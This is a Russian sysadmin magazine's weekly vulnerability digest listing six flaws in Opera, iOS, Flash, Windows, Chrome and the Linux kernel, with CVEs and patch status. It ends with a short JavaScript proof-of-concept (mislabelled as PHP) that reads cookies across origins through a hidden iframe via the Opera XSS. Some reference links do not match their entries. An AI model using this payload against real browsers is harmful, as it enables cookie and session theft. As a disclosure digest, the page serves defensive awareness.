Отчет по уязвимостям с 8 по 15 октября
www.samag.ru
     
Поиск   
              
 www.samag.ru    Web  0 товаров , сумма 0 руб.
E-mail
Пароль  
 Запомнить меня
Регистрация | Забыли пароль?
Журнал "Системный администратор"
Журнал «БИТ»
Подписка
Архив номеров
Где купить
Наука и технологии
Авторам
Рекламодателям
Контакты
   

  Опросы
  Статьи

Дата-центры  

Дата-центры: есть ли опасность утечки данных?

Российские компании уже несколько лет испытывают дефицит вычислительных мощностей. Рост числа проектов,

 Читать далее...

Книжная полка  

Защиты много не бывает

Среди книжных новинок издательства «БХВ» есть несколько изданий, посвященных методам социальной инженерии

 Читать далее...

Событие  

В банке рассола ждет сисадмина с полей фрактал-кукумбер

Читайте впечатления о слете ДСА 2024, рассказанные волонтером и участником слета

 Читать далее...

Организация бесперебойной работы  

Бесперебойная работа ИТ-инфраструктуры в режиме 24/7 Как обеспечить ее в нынешних условиях?

Год назад ИТ-компания «Крок» провела исследование «Ключевые тренды сервисного рынка 2023». Результаты

 Читать далее...

Книжная полка  

Читайте и познавайте мир технологий!

Издательство «БХВ» продолжает радовать выпуском интересных и полезных, к тому же прекрасно

 Читать далее...

СУБД PostgreSQL  

СУБД Postgres Pro

Сертификация по новым требованиям ФСТЭК и роль администратора без доступа к данным

 Читать далее...

Критическая инфраструктура  

КИИ для оператора связи. Готовы ли компании к повышению уровня кибербезопасности?

Похоже, что провайдеры и операторы связи начали забывать о требованиях законодательства

 Читать далее...

Архитектура ПО  

Архитектурные метрики. Качество архитектуры и способность системы к эволюционированию

Обычно соответствие программного продукта требованиям мы проверяем через скоуп вполне себе понятных

 Читать далее...

Как хорошо вы это знаете  

Что вам известно о разработках компании ARinteg?

Компания ARinteg (ООО «АРинтег») – системный интегратор на российском рынке ИБ –

 Читать далее...

Графические редакторы  

Рисование абстрактных гор в стиле Paper Cut

Векторный графический редактор Inkscape – яркий представитель той прослойки open source, с

 Читать далее...

День сисадмина  

Учите матчасть! Или как стать системным администратором

Лето – время не только отпусков, но и хорошая возможность определиться с профессией

 Читать далее...

День сисадмина  

Живой айтишник – это всегда движение. Остановка смерти подобна

Наши авторы рассказывают о своем опыте и дают советы начинающим системным администраторам.

 Читать далее...

Виртуализация  

Рынок решений для виртуализации

По данным «Обзора российского рынка инфраструктурного ПО и перспектив его развития», сделанного

 Читать далее...

Книжная полка  

Как стать креативным и востребованным

Издательский дом «Питер» предлагает новинки компьютерной литературы, а также книги по бизнесу

 Читать далее...

1001 и 1 книга  
19.03.2018г.
Просмотров: 6284
Комментарии: 0
Машинное обучение с использованием библиотеки Н2О

 Читать далее...

12.03.2018г.
Просмотров: 6989
Комментарии: 0
Особенности киберпреступлений в России: инструменты нападения и защита информации

 Читать далее...

12.03.2018г.
Просмотров: 4273
Комментарии: 0
Глубокое обучение с точки зрения практика

 Читать далее...

12.03.2018г.
Просмотров: 3036
Комментарии: 0
Изучаем pandas

 Читать далее...

12.03.2018г.
Просмотров: 3837
Комментарии: 0
Программирование на языке Rust (Цветное издание)

 Читать далее...

19.12.2017г.
Просмотров: 3852
Комментарии: 0
Глубокое обучение

 Читать далее...

19.12.2017г.
Просмотров: 6343
Комментарии: 0
Анализ социальных медиа на Python

 Читать далее...

19.12.2017г.
Просмотров: 3194
Комментарии: 0
Основы блокчейна

 Читать далее...

19.12.2017г.
Просмотров: 3486
Комментарии: 0
Java 9. Полный обзор нововведений

 Читать далее...

16.02.2017г.
Просмотров: 7302
Комментарии: 0
Опоздавших не бывает, или книга о стеке

 Читать далее...

17.05.2016г.
Просмотров: 10669
Комментарии: 0
Теория вычислений для программистов

 Читать далее...

30.03.2015г.
Просмотров: 12388
Комментарии: 0
От математики к обобщенному программированию

 Читать далее...

18.02.2014г.
Просмотров: 14031
Комментарии: 0
Рецензия на книгу «Читаем Тьюринга»

 Читать далее...

13.02.2014г.
Просмотров: 9155
Комментарии: 0
Читайте, размышляйте, действуйте

 Читать далее...

12.02.2014г.
Просмотров: 7106
Комментарии: 0
Рисуем наши мысли

 Читать далее...

10.02.2014г.
Просмотров: 5410
Комментарии: 3
Страна в цифрах

 Читать далее...

18.12.2013г.
Просмотров: 4646
Комментарии: 0
Большие данные меняют нашу жизнь

 Читать далее...

18.12.2013г.
Просмотров: 3446
Комментарии: 0
Компьютерные технологии – корень зла для точки роста

 Читать далее...

04.12.2013г.
Просмотров: 3178
Комментарии: 0
Паутина в облаках

 Читать далее...

03.12.2013г.
Просмотров: 3421
Комментарии: 0
Рецензия на книгу «MongoDB в действии»

 Читать далее...

02.12.2013г.
Просмотров: 3047
Комментарии: 0
Не думай о минутах свысока

 Читать далее...

Друзья сайта  

 Отчет по уязвимостям с 8 по 15 октября

Статьи / Отчет по уязвимостям с 8 по 15 октября

Автор: Андрей Бирюков

Еженедельный отчет содержит описания шести уязвимостей, в том числе и множественных в наиболее распространенных приложениях и операционных системах.

Отчет по уязвимостям с 8 по 15 октября

Еженедельный отчет содержит описания шести уязвимостей, в том числе и множественных в наиболее распространенных приложениях и операционных системах.

 

Opera  

В известном браузере Opera обнаружена уязвимость, которая позволяет удаленному пользователю произвести XSS нападение. Из-за недостаточной обработки data:URL, удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности произвольного сайта.

Пример эксплуатации уязвимости в конце статьи.

Ссылка на сайт разработчика:  https://rdot.org/forum/showthread.php?t=2444

  

Версии:  Opera 12.02 для Windows, Mac OS и Linux, возможно более ранние версии

Опасность: критическая

Операционные системы: 

ID в базе CVE:

Решение: Решения на настоящий момент не существует.

 

 Apple IOS

Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на целевой системе. Всего обнаружены 32 уязвимости. Подробное описание уязвимостей можно найти в статье http://www.securitylab.ru/vulnerability/430961.php.    

Ссылка на сайт разработчика: 

http://support.apple.com/kb/HT5503

 Версии: Apple iOS 5.x для iPhone 3GS и более поздних версий
Apple iOS для iPad 5.x
Apple iOS для iPod touch 5.x.

 

Опасность: высокая

Операционные системы: 

ID в базе CVE: CVE-2011-1167
CVE-2011-1944
CVE-2011-2821
CVE-2011-2834
CVE-2011-2845
CVE-2011-3016
CVE-2011-3021
CVE-2011-3026
CVE-2011-3027
CVE-2011-3032
CVE-2011-3034
CVE-2011-3035
CVE-2011-3036
CVE-2011-3037
CVE-2011-3038
CVE-2011-3039
CVE-2011-3040
CVE-2011-3041
CVE-2011-3042
CVE-2011-3043
CVE-2011-3044
CVE-2011-3048
CVE-2011-3050
CVE-2011-3053
CVE-2011-3059
CVE-2011-3060
CVE-2011-3064
CVE-2011-3067
CVE-2011-3068
CVE-2011-3069
CVE-2011-3071
CVE-2011-3073
CVE-2011-3074
CVE-2011-3075
CVE-2011-3076
CVE-2011-3078
CVE-2011-3081
CVE-2011-3086
CVE-2011-3089
CVE-2011-3090
CVE-2011-3105
CVE-2011-3328
CVE-2011-3457
CVE-2011-3913
CVE-2011-3919
CVE-2011-3924
CVE-2011-3926
CVE-2011-3958
CVE-2011-3966
CVE-2011-3968
CVE-2011-3969
CVE-2011-3971
CVE-2011-4599
CVE-2012-0680
CVE-2012-0682
CVE-2012-0683
CVE-2012-1126
CVE-2012-1127
CVE-2012-1128
CVE-2012-1129
CVE-2012-1130
CVE-2012-1131
CVE-2012-1132
CVE-2012-1133
CVE-2012-1134
CVE-2012-1135
CVE-2012-1136
CVE-2012-1137
CVE-2012-1138
CVE-2012-1139
CVE-2012-1140
CVE-2012-1141
CVE-2012-1142
CVE-2012-1143
CVE-2012-1144
CVE-2012-1173
CVE-2012-1520
CVE-2012-1521
CVE-2012-2815
CVE-2012-2818
CVE-2012-3589
CVE-2012-3591
CVE-2012-3592
CVE-2012-3593
CVE-2012-3594
CVE-2012-3595
CVE-2012-3596
CVE-2012-3597
CVE-2012-3598
CVE-2012-3599
CVE-2012-3590
CVE-2012-3600
CVE-2012-3601
CVE-2012-3602
CVE-2012-3603
CVE-2012-3604
CVE-2012-3605
CVE-2012-3606
CVE-2012-3607
CVE-2012-3608
CVE-2012-3609
CVE-2012-3610
CVE-2012-3611
CVE-2012-3612
CVE-2012-3613
CVE-2012-3614
CVE-2012-3615
CVE-2012-3616
CVE-2012-3617
CVE-2012-3618
CVE-2012-3620
CVE-2012-3624
CVE-2012-3625
CVE-2012-3626
CVE-2012-3627
CVE-2012-3628
CVE-2012-3629
CVE-2012-3630
CVE-2012-3631
CVE-2012-3632
CVE-2012-3633
CVE-2012-3634
CVE-2012-3635
CVE-2012-3636
CVE-2012-3637
CVE-2012-3638
CVE-2012-3639
CVE-2012-3640
CVE-2012-3641
CVE-2012-3642
CVE-2012-3644
CVE-2012-3645
CVE-2012-3646
CVE-2012-3647
CVE-2012-3648
CVE-2012-3650
CVE-2012-3651
CVE-2012-3652
CVE-2012-3653
CVE-2012-3654
CVE-2012-3655
CVE-2012-3656
CVE-2012-3658
CVE-2012-3659
CVE-2012-3660
CVE-2012-3661
CVE-2012-3663
CVE-2012-3664
CVE-2012-3665
CVE-2012-3666
CVE-2012-3667
CVE-2012-3668
CVE-2012-3669
CVE-2012-3670
CVE-2012-3671
CVE-2012-3672
CVE-2012-3673
CVE-2012-3674
CVE-2012-3676
CVE-2012-3677
CVE-2012-3678
CVE-2012-3679
CVE-2012-3680
CVE-2012-3681
CVE-2012-3682
CVE-2012-3683
CVE-2012-3684
CVE-2012-3686
CVE-2012-3691
CVE-2012-3693
CVE-2012-3695
CVE-2012-3696
CVE-2012-3703
CVE-2012-3704
CVE-2012-3706
CVE-2012-3708
CVE-2012-3710
CVE-2012-3722
CVE-2012-3724
CVE-2012-3725
CVE-2012-3726
CVE-2012-3727
CVE-2012-3728
CVE-2012-3729
CVE-2012-3730
CVE-2012-3731
CVE-2012-3732
CVE-2012-3733
CVE-2012-3734
CVE-2012-3735
CVE-2012-3736
CVE-2012-3737
CVE-2012-3738
CVE-2012-3739
CVE-2012-3740
CVE-2012-3741
CVE-2012-3742
CVE-2012-3743
CVE-2012-3744
CVE-2012-3745
CVE-2012-3746
CVE-2012-3747

 

 

 

Решение: Для устранения уязвимостей установите обновление с сайта производителя

Adobe Flash Player

Обнаруженные уязвимости позволяют удаленному пользователю скомпрометировать целевую систему. Обнаружены множественные уязвимости в Adobe Flash Player и Adobe AIR, которые позволяют удаленному пользователю вызвать переполнение буфера или повреждение памяти и выполнить произвольный код на целевой системе. Подробности уязвимостей не сообщаются.

Ссылка на сайт разработчика:  

http://www.adobe.com/support/security/bulletins/apsb12-22.html    

Версии: Adobe Flash Player 11.4.402.278 для Windows, и более ранние версии
Adobe Flash Player 11.4.402.265 для Macintosh, и более ранние версии
Adobe Flash Player 11.2.202.238 для Linux, и более ранние версии
Adobe Flash Player 11.1.115.17 для Android 4.x, и более ранние версии
Adobe Flash Player 11.1.111.16 для Android 3.x и 2.x, и более ранние версии
Adobe AIR 3.4.0.2540 для Windows and Macintosh, и более ранние версии
Adobe AIR 3.4.0.2540 SDK, и более ранние версии
Adobe AIR 3.4.0.2540 для Android, и более ранние версии   

Опасность: критическая

Операционные системы: 

ID в базе CVE:  

CVE-2012-5248
CVE-2012-5249
CVE-2012-5250
CVE-2012-5251
CVE-2012-5253
CVE-2012-5254
CVE-2012-5255
CVE-2012-5257
CVE-2012-5259
CVE-2012-5260
CVE-2012-5262
CVE-2012-5264
CVE-2012-5265
CVE-2012-5266
CVE-2012-5252
CVE-2012-5256
CVE-2012-5258
CVE-2012-5261
CVE-2012-5263
CVE-2012-5267
CVE-2012-5268
CVE-2012-5269
CVE-2012-5270
CVE-2012-5271
CVE-2012-5272

Решение: Установить обновления с сайта производителя.

 

Microsoft Windows

В операционной системе Windows из-за того, что служба IKE and AuthIP IPsec Keying Modules пытается подключить несуществующую на системе библиотеку wlbsctrl.dll, локальный пользователь может поместить вредоносный файл с одноименным названием в поисковый путь по умолчанию и повысить свои привилегии на системе. Для успешной эксплуатации уязвимости на системе должен быть установлен ActivePerl в конфигурации по умолчанию или любое другое приложение, которое устанавливается в корневую директорию диска C и дописывает путь к установочной директории в системную переменную окружения PATH.

 

Ссылки на сайт разработчика: 

https://www.vmware.com/support/pubs/vcops-advanced-pubs.html  

 

Версии: Microsoft Windows Vista
Microsoft Windows 2008
Microsoft Windows 7

 

Опасность: критическая

Операционные системы: Microsoft Windows Vista
Microsoft Windows 2008
Microsoft Windows 7

 

ID в базе CVE: 

CVE-2012-5377
CVE-2012-5378
CVE-2012-5379
CVE-2012-5380
CVE-2012-5381
CVE-2012-5382
CVE-2012-5383

 

Решение: В настоящее время исправления не существует.  

 

Google Chrome

По еженедельной традиции в браузере Google Chrome обнаружены множественные уязвимости, которые позволяют удаленному пользователю выполнить произвольный код на целевой системе.

 

1. Обнаружены множественные уязвимости в Adobe Flash Player, входящем в состав Google Chrome. Удаленный пользователь может скомпрометировать целевую систему. Подробное описание уязвимостей: http://www.securitylab.ru/vulnerability/431016.php

 

2. Уязвимость существует из-за ошибки, относящейся к рендерингу Skia-текста. Удаленный пользователь может выполнить произвольный код на целевой системе.

 

3. Уязвимость существует из-за ошибки состояния операции при обработке аудио устройств. Удаленный пользователь может выполнить произвольный код на целевой системе.

 

4. Уязвимость существует из-за ошибки, относящейся к обработке регулярных выражений ICU. Удаленный пользователь может спровоцировать чтение данных за пределами буфера и выполнить произвольный код на целевой системе.

 

5. Уязвимость существует из-за ошибки при обработке compositor. Удаленный пользователь может спровоцировать чтение данных за пределами буфера и выполнить произвольный код на целевой системе.

 

6. Уязвимость существует из-за ошибки, относящейся к механизму наблюдения за отказами в обслуживании Pepper плагинов. Удаленный пользователь может выполнить произвольный код на целевой системе.

Ссылки на сайт разработчика:    

http://googlechromereleases.blogspot.dk/2012/10/stable-channel-update.html

Версии:  

 

Опасность: высокая

Операционные системы: 

 

ID в базе CVE: CVE-2012-5248
CVE-2012-5249
CVE-2012-5250
CVE-2012-5251
CVE-2012-5253
CVE-2012-5254
CVE-2012-5255
CVE-2012-5257
CVE-2012-5259
CVE-2012-5260
CVE-2012-5262
CVE-2012-5264
CVE-2012-5265
CVE-2012-5266
CVE-2012-5252
CVE-2012-5256
CVE-2012-5258
CVE-2012-5261
CVE-2012-5263
CVE-2012-5267
CVE-2012-5268
CVE-2012-5269
CVE-2012-5270
CVE-2012-5271
CVE-2012-5272
CVE-2012-2900
CVE-2012-5108
CVE-2012-5109
CVE-2012-5110
CVE-2012-5111

Решение: Установить соответствующее обновление с сайта производителя  

 

Linux Kernel

Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует из-за ошибки проверки границ данных в функции "hfs_bnode_read()" в файле fs/hfs/bnode.c. Локальный пользователь может вызвать переполнение буфера и повысить свои привилегии.

Ссылки на сайт разработчика:    

http://www.kernel.org/pub/linux/kernel/v2.6/longterm/v2.6.32/ChangeLog-2.6.32.60

Версии: Linux Kernel версии до 2.6.32.60

 

Опасность: высокая

Операционные системы: 

 

ID в базе CVE:

Решение: Установить соответствующее обновление с сайта производителя  

 

 

Эксплоит для уязвимость в браузере Opera

 

PHP код для чтения cookie:

 

<script>

if(document.domain == 'tinyurl.com')

    location.reload();

 

function xss()

{

    alert(document.frames[0].document.cookie);

}

 

function ifrAdd()

{

    var ifr = document.createElement('iframe');

    ifr.style = 'width:0px;height:0px;visibility:hidden';

    ifr.src = 'http';

    ifr.src += document.referrer.length ? '' : 's';

    ifr.src += '://forum.antichat.ru/css/a.css';

    ifr.onload = function(){xss()};

    document.body.appendChild(ifr);

}

 

</script>

<body onload=ifrAdd()> 

 

Использованные источники:

  1. Securitytracker.com
  2. Securitylab.ru

 

 

 

 

 

Комментарии отсутствуют

               Copyright © Системный администратор

Яндекс.Метрика
Tel.: (499) 277-12-45
E-mail: sa@samag.ru